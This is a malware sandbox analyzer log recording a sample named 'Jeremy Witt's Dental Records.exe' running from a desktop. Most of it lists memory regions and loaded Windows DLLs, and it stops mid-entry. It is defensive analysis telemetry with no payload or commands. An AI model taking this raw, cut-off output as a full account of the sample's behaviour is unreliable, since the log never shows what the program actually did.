# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Apr 12 2018 14:32:59 # Log Creation Date: 05.07.2018 13:44:07.211 Process: id = "1" image_name = "jeremy witt's dental records.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\jeremy witt's dental records.exe" page_root = "0x18564000" os_pid = "0xe14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x890000 end_va = 0x8b2fff entry_point = 0x890000 region_type = mapped_file name = "jeremy witt's dental records.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\jeremy witt's dental records.exe") Region: id = 2 start_va = 0xc40000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 3 start_va = 0xc60000 end_va = 0xc61fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4 start_va = 0xc70000 end_va = 0xc83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 5 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6 start_va = 0xcd0000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 7 start_va = 0xdd0000 end_va = 0xdd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 8 start_va = 0xde0000 end_va = 0xde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 9 start_va = 0xdf0000 end_va = 0xdf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 10 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7f800000 end_va = 0x7f822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Region: id = 12 start_va = 0x7f825000 end_va = 0x7f825fff entry_point = 0x0 region_type = private name = "private_0x000000007f825000" filename = "" Region: id = 13 start_va = 0x7f829000 end_va = 0x7f829fff entry_point = 0x0 region_type = private name = "private_0x000000007f829000" filename = "" Region: id = 14 start_va = 0x7f82d000 end_va = 0x7f82ffff entry_point = 0x0 region_type = private name = "private_0x000000007f82d000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 17 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 165 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 166 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 167 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 168 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 169 start_va = 0xf60000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 170 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 171 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 172 start_va = 0xc40000 end_va = 0xc4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 173 start_va = 0xe40000 end_va = 0xefdfff entry_point = 0xe40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 174 start_va = 0x74c40000 end_va = 0x74cd0fff entry_point = 0x74c40000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 175 start_va = 0x7f700000 end_va = 0x7f7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f700000" filename = "" Region: id = 176 start_va = 0xc50000 end_va = 0xc53fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 177 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 178 start_va = 0x1060000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 179 start_va = 0x74950000 end_va = 0x74b73fff entry_point = 0x74950000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 180 start_va = 0x74b80000 end_va = 0x74b96fff entry_point = 0x74b80000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 181 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 182 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 183 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 184 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 185 start_va = 0x75070000 end_va = 0x7507efff entry_point = 0x75070000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 186 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 187 start_va = 0x750d0000 end_va = 0x755acfff entry_point = 0x750d0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 188 start_va = 0x755b0000 end_va = 0x7696efff entry_point = 0x755b0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 189 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 190 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 191 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 192 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 193 start_va = 0x777f0000 end_va = 0x77833fff entry_point = 0x777f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 194 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 195 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 196 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 197 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 198 start_va = 0x7f82a000 end_va = 0x7f82cfff entry_point = 0x0 region_type = private name = "private_0x000000007f82a000" filename = "" Region: id = 199 start_va = 0x1160000 end_va = 0x12e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 200 start_va = 0x1340000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 201 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 202 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 203 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 204 start_va = 0xe00000 end_va = 0xe00fff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 205 start_va = 0xe10000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 206 start_va = 0x1350000 end_va = 0x14d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001350000" filename = "" Region: id = 207 start_va = 0x14e0000 end_va = 0x28dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014e0000" filename = "" Region: id = 208 start_va = 0x28e0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 209 start_va = 0xe10000 end_va = 0xe25fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 210 start_va = 0xf40000 end_va = 0xf48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 211 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 212 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 213 start_va = 0x29e0000 end_va = 0x2d16fff entry_point = 0x29e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 214 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 215 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 216 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 217 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 218 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 219 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 220 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 221 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 222 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 223 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 224 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 225 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 226 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 227 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 228 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 229 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 230 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 231 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 232 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 233 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 234 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 235 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 236 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 237 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 238 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 239 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 240 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 241 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 242 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 243 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 244 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 245 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 246 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 247 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 248 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 249 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 250 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 251 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 252 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 253 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 254 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 255 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 256 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 257 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 258 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 259 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 260 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 261 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 262 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 263 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 264 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 265 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 266 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 267 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 268 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 269 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 270 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 271 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 272 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 273 start_va = 0xe20000 end_va = 0xe28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 274 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 275 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 276 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 277 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 278 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 279 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 280 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 281 start_va = 0x12f0000 end_va = 0x12f0fff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 282 start_va = 0x1300000 end_va = 0x1300fff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 283 start_va = 0x1310000 end_va = 0x1310fff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 284 start_va = 0x1320000 end_va = 0x1320fff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 285 start_va = 0x1310000 end_va = 0x1310fff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 286 start_va = 0x1330000 end_va = 0x1330fff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 287 start_va = 0x2d20000 end_va = 0x2d20fff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 288 start_va = 0x2d30000 end_va = 0x2d30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 289 start_va = 0x2d40000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 290 start_va = 0x2d40000 end_va = 0x2d55fff entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 291 start_va = 0x2d60000 end_va = 0x2d68fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d60000" filename = "" Region: id = 292 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 293 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 294 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 295 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 296 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 297 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 298 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 299 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 300 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 301 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 302 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 303 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 304 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 305 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 306 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 307 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 308 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 309 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 310 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 311 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 312 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 313 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 314 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 315 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 316 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 317 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 318 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 319 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 320 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 321 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 322 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 323 start_va = 0x2d40000 end_va = 0x2d48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d40000" filename = "" Region: id = 324 start_va = 